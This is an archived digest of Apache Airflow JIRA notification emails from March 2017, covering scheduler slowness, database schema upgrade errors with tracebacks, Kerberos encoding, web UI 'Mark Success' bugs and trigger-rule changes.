> table is now joined against running dag_runs with a 'scheduled' run_id.
> This change is however not required, as task_instances will only be in 
> 'scheduled' state when they are send to the executore. Tasks from dag_runs in 
> failed state will not be scheduled by contract.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-807) Scheduler is very slow when a .py file has many DAGs in it

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-807?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-807.

Resolution: Fixed

> Scheduler is very slow when a .py file has many DAGs in it
> --
>
> Key: AIRFLOW-807
> URL: https://issues.apache.org/jira/browse/AIRFLOW-807
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: 1.8.0b2
>Reporter: Chris Riccomini
>Assignee: Chris Riccomini
> Fix For: Airflow 1.8
>
>
> While running Airflow 1.8.0b2 in production, we noticed a significant 
> performance issue with one of our DAGs.
> The .py file (called db.py) generates a bunch of DAGs. This file was taking > 
> 900 seconds for the scheduler to process, which was introducing significant 
> delays in our data pipeline.
> We enabled slow_query log for MySQL, and saw that this query was taking more 
> than 10 seconds per DAG in the .py file:
> {code:sql}
> SELECT task_instance.task_id AS task_id, max(task_instance.execution_date) AS 
> max_ti 
> FROM task_instance 
> WHERE task_instance.dag_id = 'dag1' AND task_instance.state = 'success' AND 
> task_instance.task_id IN ('t1', 't2') GROUP BY task_instance.task_id
> {code}
> This query is run inside jobs.py's manage_slas method. When running an 
> explain, we can see that MySQL is using the wrong index for it:
> {noformat}
> ++-+---+--++--+-+---+---+--+
> | id | select_type | table | type | possible_keys 
>  | key  | key_len | ref   | rows  | Extra 
>|
> ++-+---+--++--+-+---+---+--+
> |  1 | SIMPLE  | task_instance | ref  | 
> PRIMARY,ti_dag_state,ti_pool,ti_state_lkp,ti_state | ti_state | 63  | 
> const | 81898 | Using where; Using index |
> ++-+---+--++--+-+---+---+--+
> {noformat}
> It's using ti_state, but should be using ti_primary. We tried running 
> ANALYZE/OPTIMIZE on the {{task_instance}} table, but it didn't improve the 
> query plan or performance time.
> Next, we added a hint to the SqlAlchemy query object, which improved the 
> performance by about 10x, dropping the db.py parsing down to 90 seconds.
> I then got another 2x boost by simply aborting the manage_slas method at the 
> start if the DAG has no tasks SLAs in it (none of our DAGs do). This dropped 
> the db.py parse time to 45-50 seconds.
> This JIRA is to add a short circuit in manage_slas, and a hint for MySQL in 
> the query.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Closed] (AIRFLOW-810) Alembic upgrade path not consistent due to reverted index creation

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-810?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-810.
--
   Resolution: Fixed
Fix Version/s: 1.8.0

> Alembic upgrade path not consistent due to reverted index creation
> --
>
> Key: AIRFLOW-810
> URL: https://issues.apache.org/jira/browse/AIRFLOW-810
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>




--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924980#comment-15924980
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

It seems database schema changed form 1.7 to 1.8 "column task_instance.pid does 
not exist"
Is there is a documented way to upgrade database to the new schema?

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution),
> started seeing below error stack again and again .. In scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': 

[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924978#comment-15924978
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

I've upragded airflow to 1.80-rc5 as you suggested. webserver started fine, 
scheduler fails and dies with following exception:

{noformat}
[2017-03-14 14:52:13,474] {jobs.py:1311} INFO - Exited execute loop
Traceback (most recent call last):
  File "/opt/cloudera/parcels/Anaconda/bin/airflow", line 28, in 
args.func(args)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/bin/cli.py",
 line 839, in scheduler
job.run()
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 200, in run
self._execute()
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 1309, in _execute
self._execute_helper(processor_manager)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 1364, in _execute_helper
self.reset_state_for_orphaned_tasks(dr, session=session)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/utils/db.py",
 line 53, in wrapper
result = func(*args, **kwargs)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
line 227, in reset_state_for_orphaned_tasks
tis.extend(dag_run.get_task_instances(state=State.SCHEDULED, 
session=session))
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/utils/db.py",
 line 53, in wrapper
result = func(*args, **kwargs)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py", 
line 3960, in get_task_instances
return tis.all()
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
 line 2588, in all
return list(self)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
 line 2736, in __iter__
return self._execute_and_instances(context)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
 line 2751, in _execute_and_instances
result = conn.execute(querycontext.statement, self._params)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 914, in execute
return meth(self, multiparams, params)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/sql/elements.py",
 line 323, in _execute_on_connection
return connection._execute_clauseelement(self, multiparams, params)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1010, in _execute_clauseelement
compiled_sql, distilled_params
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1146, in _execute_context
context)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1341, in _handle_dbapi_exception
exc_info
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/util/compat.py",
 line 200, in raise_from_cause
reraise(type(exception), exception, tb=exc_tb, cause=cause)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/base.py",
 line 1139, in _execute_context
context)
  File 
"/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/engine/default.py",
 line 450, in do_execute
cursor.execute(statement, parameters)
sqlalchemy.exc.ProgrammingError: (psycopg2.ProgrammingError) column 
task_instance.pid does not exist
LINE 1: ...nstance.queued_dttm AS task_instance_queued_dttm, task_insta...
 ^
 [SQL: 'SELECT task_instance.task_id AS task_instance_task_id, 
task_instance.dag_id AS task_instance_dag_id, task_instance.execution_date AS 
task_instance_execution_date, task_instance.start_date AS 
task_instance_start_date, task_instance.end_date AS task_instance_end_date, 
task_instance.duration AS task_instance_duration, task_instance.state AS 
task_instance_state, task_instance.try_number AS task_instance_try_number, 
task_instance.hostname AS task_instance_hostname, task_instance.unixname AS 
task_instance_unixname, task_instance.job_id AS task_instance_job_id, 
task_instance.pool AS task_instance_pool, task_instance.queue AS 
task_instance_queue, task_instance.priority_weight AS 
task_instance_priority_weight, task_instance.operator AS 
task_instance_operator, task_instance.queued_dttm AS task_instance_queued_dttm, 
task_instance.pid AS task_instance_pid \nFROM task_instance \nWHERE 
task_instance.dag_id = %(dag_id_1)s AND task_instance.execution_date = 
%(execution_date_1)s AND task_instance.state = %(state_1)s'] [parameters: 
{'state_1': u'scheduled', 'execution_date_1': datetime.datetime(2015, 1, 1, 

[jira] [Updated] (AIRFLOW-834) get_dep_statuses raises PendingDeprecationWarning in Python 3.5

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-834?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-834:
---
Fix Version/s: 1.8.0

> get_dep_statuses raises PendingDeprecationWarning in Python 3.5
> ---
>
> Key: AIRFLOW-834
> URL: https://issues.apache.org/jira/browse/AIRFLOW-834
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.8, 1.8.0b5
>Reporter: Marek BaczyƄski
>Priority: Minor
>  Labels: easyfix
> Fix For: 1.8.0
>
>
> {noformat}
> venv/src/airflow/airflow/ti_deps/deps/base_ti_dep.py:94: 
> PendingDeprecationWarning: generator '_get_dep_statuses' raised StopIteration
> for dep_status in self._get_dep_statuses(ti, session, dep_context):
> {noformat}
> fix would be to change these into plain return



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-838) Race condition in LocalTaskJob

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-838?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-838.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Race condition in LocalTaskJob
> --
>
> Key: AIRFLOW-838
> URL: https://issues.apache.org/jira/browse/AIRFLOW-838
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Alex Guziel
>Priority: Minor
> Fix For: 1.8.0
>
>
> Right now, a LocalTaskJob will terminate if the state is not "running" but 
> only if it has observed that the state was "running" before. This could lead 
> to a situation in which it never terminates although the state is not 
> "running" if it was from "running" to another state before it could be 
> observed.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Assigned] (AIRFLOW-840) Python3 encoding issue in Kerberos

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-840?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin reassigned AIRFLOW-840:
--

Assignee: Bolke de Bruin

> Python3 encoding issue in Kerberos
> --
>
> Key: AIRFLOW-840
> URL: https://issues.apache.org/jira/browse/AIRFLOW-840
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: security
>Affects Versions: Airflow 1.8
> Environment: $ python --version
> Python 3.4.3
>Reporter: Erik Cederstrand
>Assignee: Bolke de Bruin
>  Labels: security
>
> While attempting to configure Kerberos ticket renewal in a Python3 
> environment, I encountered this encoding issue trying to run {{airflow 
> kerberos}}:
> {code:none}
> Traceback (most recent call last):
>   File "/usr/local/bin/airflow", line 15, in 
> args.func(args)
>   File "/usr/local/lib/python3.4/dist-packages/airflow/bin/cli.py", line 600, 
> in kerberos
> airflow.security.kerberos.run()
>   File "/usr/local/lib/python3.4/dist-packages/airflow/security/kerberos.py", 
> line 110, in run
> renew_from_kt()
>   File "/usr/local/lib/python3.4/dist-packages/airflow/security/kerberos.py", 
> line 55, in renew_from_kt
> "\n".join(subp.stderr.readlines(
> TypeError: sequence item 0: expected str instance, bytes found
> {code}
> The issue here (ignoring for a moment why {{kinit}} is failing on my machine) 
> is that Popen in Python3 returns {{bytes}} for stdin/stdout, but both are 
> handled as if they are {{str}}.
> I'm unsure what the Py2/3 compat policy is at Airflow, but a simple {{from 
> six import PY2}} and an if/else seems like the least intrusive fix. The 
> non-PY2 path would then add something like 
> {{subp.stdin.readlines().decode(errors='ignore')}}



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Closed] (AIRFLOW-846) Release schedule, latest tag is too old

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-846?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-846.
--
Resolution: Not A Bug

http://mail-archives.apache.org/mod_mbox/incubator-airflow-dev/201703.mbox/thread

> Release schedule, latest tag is too old
> ---
>
> Key: AIRFLOW-846
> URL: https://issues.apache.org/jira/browse/AIRFLOW-846
> Project: Apache Airflow
>  Issue Type: Task
>Reporter: Ultrabug
>Priority: Blocker
>  Labels: release, tagging
>
> To my understanding, there is no clear point about the release schedule of 
> the project.
> The latest tag is 1.7.1.3 from June 2016, which is not well suited for 
> production now days.
> For example, the latest available release is still affected by AIRFLOW-178 
> which means that we have to patch the sources on production to work with ZIP 
> files.
> Could you please share your thoughts and position on the release planning of 
> the project ?
> Would it be possible to get a newer tag sometimes soon ?
> Thank you



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-984) Subdags unrecognized when subclassing SubDagOperator

2017-03-14 Thread Patrick McKenna (JIRA)
Patrick McKenna created AIRFLOW-984:
---

 Summary: Subdags unrecognized when subclassing SubDagOperator
 Key: AIRFLOW-984
 URL: https://issues.apache.org/jira/browse/AIRFLOW-984
 Project: Apache Airflow
  Issue Type: Bug
Reporter: Patrick McKenna
Priority: Minor


If a user subclasses SubDagOperator, the parent DAG will not pick up the 
subdags:

https://github.com/jlowin/airflow/blob/44fcabc36048cd6e80660fc023afce85e3d435a0/airflow/models.py#L2969

which means a DagBag won't find them:

https://github.com/jlowin/airflow/blob/44fcabc36048cd6e80660fc023afce85e3d435a0/airflow/models.py#L311
https://github.com/jlowin/airflow/blob/44fcabc36048cd6e80660fc023afce85e3d435a0/airflow/models.py#L365

This PR appears to be the culprit: 
https://github.com/apache/incubator-airflow/pull/1196/files.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-864) Charts have regressed

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-864?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-864:
---
Priority: Major  (was: Critical)

> Charts have regressed
> -
>
> Key: AIRFLOW-864
> URL: https://issues.apache.org/jira/browse/AIRFLOW-864
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: webapp
>Reporter: Siddharth Anand
> Attachments: broken_charts_duplicate.png, Show_hide_all_missing.png
>
>
> 
> +*{color:blue} Issue 1 : The task duration endpoint displays 2 charts 
> {color}*+
> !broken_charts_duplicate.png!
> 
> +*{color:blue} Issue 2 : No way currently to hide/show all tasks {color}*+
> There used to be an option to hide/show all tasks. That's gone. I have 20+ 
> tasks but often need to hone in on a single task. That's not possible
> !Show_hide_all_missing.png!



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-867) Tons of unit tests are ignored

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-867?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924958#comment-15924958
 ] 

Bolke de Bruin commented on AIRFLOW-867:


[~aoen] [~saguziel] [~jlowin]

> Tons of unit tests are ignored
> --
>
> Key: AIRFLOW-867
> URL: https://issues.apache.org/jira/browse/AIRFLOW-867
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: tests
>Reporter: George Sakkis
>Assignee: George Sakkis
>
> I was poking around in tests and found out that lots of tests are not 
> discovered by nosetests:
> {noformat}
> $ nosetests -q --collect-only 
> --
> Ran 254 tests in 0.948s
> $ grep -R 'def test' tests/ | wc -l
> 360
> {noformat}
> Initially I thought it might be related to not having installed all extra 
> dependencies but it turns out it's because apparently nosetests expects 
> explicit import of the related modules instead of discovering them 
> automatically (like py.test). For example, when adding an {{from 
> .ti_deps.deps.runnable_exec_date_dep import *}} in {{tests/__init__.py}} it 
> finds 260 tests, while when commenting out all imports in this module it 
> finds only 15!
> h4. Possible options
> * Quick fix: Add the necessary missing "import *" to discover all current 
> tests.
> * Better fix: Rename all test modules to start with "test_"
>   -Move from nosetests to py.test and get rid of the ugly error-prone 'import 
> *' hack.-



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-869) Web UI Mark Success Upstream Option Bug

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-869?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-869.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Web UI Mark Success Upstream Option Bug
> ---
>
> Key: AIRFLOW-869
> URL: https://issues.apache.org/jira/browse/AIRFLOW-869
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.8
>Reporter: Yi Chen
> Fix For: 1.8.0
>
>   Original Estimate: 24h
>  Remaining Estimate: 24h
>
> A simple bug report: I tracked down to the source code of Airflow Web UI, 
> look at this line, 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1127
>  .  It should be `relatives = task.get_flat_relatives(upstream=True)`. But 
> even with this fix, there are still issues about the "Mark Success" 
> functionality. I hope we ship this bug fix along with v1.8. And I will open 
> another ticket discussing the functionality of "Mark Success".



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-870) Airflow Web UI "Mark Success" action not working properly

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-870?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-870.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Airflow Web UI "Mark Success" action not working properly
> -
>
> Key: AIRFLOW-870
> URL: https://issues.apache.org/jira/browse/AIRFLOW-870
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.8
>Reporter: Yi Chen
> Fix For: 1.8.0
>
>   Original Estimate: 168h
>  Remaining Estimate: 168h
>
> I have found a few issues and some ideas of resolving them:
> 1) *Issue*: In Web UI, if click Mark Success of a task that has not been 
> processed(a.k.a any white box in list view), I get "No task instances to mark 
> as successful" error message.
> *Reason*: A task that has not been processed has a record in the table 
> task_instance with state column value as NULL. Then, here 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1146
>  , this line filters out not only the case `TI.state = State.SUCCESS` but 
> also the case `TI.state is NULL`. 
> *Solution*: make this line as ` or_((TI.state.is_(None)), TI.state != 
> State.SUCCESS)).all()` 
> 2) *Issue*: Not clear why we need a new option in "Mark Success" -- the 
> "Recursive" option. I think we used to have the option "DownStream" or 
> "UpStream" with recursive searching. Can anyone explain the design and double 
> check the implementation? Right now, if I do not choose "Recursive" option 
> with the "DownStream". I get KeyError in this line 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1188.
>  
> *Reason*: In this line, 
> https://github.com/apache/incubator-airflow/blob/v1-8-stable/airflow/www/views.py#L1122
>  , We actually have got the relatives from recursive searching already, and 
> the task_ids is populated, but task_id_to_dag is not populated properly if  
> "Recursive" option is not chosen. Therefore a KeyError show up later as 
> mentioned above.
> *Solution*: I think we have to discuss the design of the desired behavior of 
> each option and refactor code w.r.t.the design.
> [This is my first Apache JIRA ticket. Feel free to point out any mistakes in 
> reporting and describing issues if I have any.]



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-876) Change or document default gunicorn worker class

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-876?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924956#comment-15924956
 ] 

Bolke de Bruin commented on AIRFLOW-876:


PR welcome on documentation

> Change or document default gunicorn worker class
> 
>
> Key: AIRFLOW-876
> URL: https://issues.apache.org/jira/browse/AIRFLOW-876
> Project: Apache Airflow
>  Issue Type: Improvement
>Reporter: Peter Marton
>Priority: Minor
>
> The sync gunicorn worker class is not production ready unless behind a proxy 
> like nginx. This is clearly documented in the gunicorn docs, but never 
> mentioned anywhere in the Airflow docs. I feel that either the default should 
> be changed to one of the asynchronous models or users should be adequately 
> warned.
> What makes this even more painful is that AWS ELB tries to keep open the 
> connections for health checks, essentially DOSing the Airflow webserver if 
> used with the default config. But it happens with Chrome's URL preloading as 
> well as mentioned in the link below.
> More info:
> https://www.mail-archive.com/dev@airflow.incubator.apache.org/msg00746.html
> http://stackoverflow.com/questions/21634680/running-unicorn-behind-amazon-elb



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-890) Having a REST layer for all command line interface of Airflow

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-890?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924948#comment-15924948
 ] 

Bolke de Bruin commented on AIRFLOW-890:


Any help definitely welcome here. We have example endpoints.

> Having a REST layer for all command line interface of Airflow
> -
>
> Key: AIRFLOW-890
> URL: https://issues.apache.org/jira/browse/AIRFLOW-890
> Project: Apache Airflow
>  Issue Type: Wish
>  Components: cli
>Reporter: Amit Ghosh
>   Original Estimate: 504h
>  Remaining Estimate: 504h
>
> We are planning to use Airflow and was thinking if can have a REST interface 
> for all the command line interface. This will be a cool feature to have. If 
> you all wish then I can take up that task.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-906) Update Code icon from lightning bolt to file

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-906?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-906.

   Resolution: Fixed
Fix Version/s: 1.8.1

> Update Code icon from lightning bolt to file
> 
>
> Key: AIRFLOW-906
> URL: https://issues.apache.org/jira/browse/AIRFLOW-906
> Project: Apache Airflow
>  Issue Type: Improvement
>  Components: webapp
>Reporter: Dan Jarratt
>Priority: Minor
> Fix For: 1.8.1
>
> Attachments: airflow-current-flash-icon.png, 
> airflow-suggested-file-icon.png
>
>
> Lightning bolts are not a visual metaphor for code or files. Since Glyphicon 
> doesn't have a code icon (<>, for instance), we should use its file icon.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Work started] (AIRFLOW-982) Update examples/docs for ALL_SUCCESS/ONE_SUCCESS including skipped

2017-03-14 Thread Daniel Huang (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-982?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Work on AIRFLOW-982 started by Daniel Huang.

> Update examples/docs for ALL_SUCCESS/ONE_SUCCESS including skipped
> --
>
> Key: AIRFLOW-982
> URL: https://issues.apache.org/jira/browse/AIRFLOW-982
> Project: Apache Airflow
>  Issue Type: Improvement
>  Components: docs, examples
>Reporter: Daniel Huang
>Assignee: Daniel Huang
>Priority: Minor
>




--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-983) Make trigger rules more explicit regarding success vs skipped

2017-03-14 Thread Daniel Huang (JIRA)
Daniel Huang created AIRFLOW-983:


 Summary: Make trigger rules more explicit regarding success vs 
skipped
 Key: AIRFLOW-983
 URL: https://issues.apache.org/jira/browse/AIRFLOW-983
 Project: Apache Airflow
  Issue Type: Improvement
  Components: dependencies
Reporter: Daniel Huang


Since AIRFLOW-719, the trigger rules all_success/one_success include both 
success and skipped states.

We should probably make ALL_SUCCESS strictly success (again) and add a separate 
ALL_SUCCESS_OR_SKIPPED/ALL_FAILED_OR_SKIPPED. ALL_SUCCESS_OR_SKIPPED may be a 
more appropriate default trigger rule as well. Otherwise, we need to note in 
LatestOnly/ShortCircuit/Branch operators of the appropriate trigger rule to use 
there.

Some previous discussion in 
https://github.com/apache/incubator-airflow/pull/1961



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-982) Update examples/docs for ALL_SUCCESS/ONE_SUCCESS including skipped

2017-03-14 Thread Daniel Huang (JIRA)
Daniel Huang created AIRFLOW-982:


 Summary: Update examples/docs for ALL_SUCCESS/ONE_SUCCESS 
including skipped
 Key: AIRFLOW-982
 URL: https://issues.apache.org/jira/browse/AIRFLOW-982
 Project: Apache Airflow
  Issue Type: Improvement
  Components: docs, examples
Reporter: Daniel Huang
Assignee: Daniel Huang
Priority: Minor






--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-927) LDAP authtorization: ldap3 doesn't understand anything coming from configuration file

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-927?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-927.

   Resolution: Fixed
Fix Version/s: 1.8.0

> LDAP authtorization: ldap3 doesn't understand anything coming from 
> configuration file
> -
>
> Key: AIRFLOW-927
